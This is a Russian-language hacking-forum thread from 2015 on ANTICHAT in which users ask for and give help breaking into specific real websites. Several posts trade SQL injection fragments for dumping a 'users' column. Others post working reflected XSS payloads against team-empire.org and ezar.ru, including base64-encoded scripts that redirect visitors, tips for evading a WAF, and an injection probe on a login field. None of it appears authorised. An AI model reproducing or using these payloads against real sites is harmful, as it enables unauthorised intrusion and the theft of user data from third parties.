ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.07.2015, 14:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
51198
Репутация:
3
|
|
Сообщение от RedFern.89
RedFern.89 said:
↑
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
Код:
Code:
http://navi-gaming.com/en/achievements?id[]=71
Код:
Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
Спрашивал с одного форума и вот что говорят,цитирую : "Он явно посчитал page за число и каким-то образом сделал из него -1, умножив затем на количество элементов, которые нужно достать, получив offset равный -7. Я полагаю, там (int) $_GET['page'], а дальше просто ошибка алгоритма, так что это не инъекция."
|
|
|
|
16.07.2015, 09:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
726
Репутация:
0
|
|
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?
|
|
|
|
16.07.2015, 14:11
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Сообщение от RedFern.89
RedFern.89 said:
↑
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
Код:
Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
Раскрутить не получилось, но XSS получилось.
Код:
Code:
xss http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,YWxlcnQoL1hTU1BPU0VELyk=%3E
http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vZm9ydW0uYW50aWNoYXQucnUnOw==%3E
WAF только на формы, обход через Request_Uri
|
|
|
16.07.2015, 14:38
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Root2
Root2 said:
↑
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?если просто в hex? есть вывод?
|
|
|
|
16.07.2015, 17:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
726
Репутация:
0
|
|
Сообщение от yarbabin
yarbabin said:
↑
если просто в hex? есть вывод? Нет тоже информация не отоброжается
|
|
|
|
17.07.2015, 22:57
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Root2
Root2 said:
↑
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть? concat_ws(0x3a,convert(users%20using%20utf8))
А так ?
|
|
|
|
18.07.2015, 09:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
726
Репутация:
0
|
|
Сообщение от kingbeef
kingbeef said:
↑
concat_ws(0x3a,convert(users%20using%20utf8))
А так ? Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?
|
|
|
|
18.07.2015, 14:52
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Root2
Root2 said:
↑
Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет? Покажи ссылку
|
|
|
|
19.07.2015, 00:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
1434
Репутация:
0
|
|
Помогите, попал в тупик.
Вот страница - http://www.ezar.ru/?a=reg
Поле "логин" уязвимое, посылается форма через POST на http://www.ezar.ru/prereg.php , там вылетает Warning: mysql_num_rows()
Что делать дальше? Попробовал подбирать поля, подменяя запросы через Burp, но что то нифига не получается. |
|
|
|
19.07.2015, 01:21
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Пока мы попытаемся помочь Вам из SqlInj, можете поиграться с ихними XSS:
Код:
Code:
1) http://www.ezar.ru/testd.php?domain=ezar.ru&nick=
2) url: http://www.ezar.ru/prereg.php
POST: tarif=10&konstrukotor=yes&login=11&nick2=%3Cscript%3Ealert%28%2fXSSPOSED%2f%29%3B%3C%2fscript%3E&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK
Чтобы не мучится с POST, работайте так:
Код:
Code:
http://www.ezar.ru/prereg.php?tarif=10&konstrukotor=yes&nick2=nick&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK&login='
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
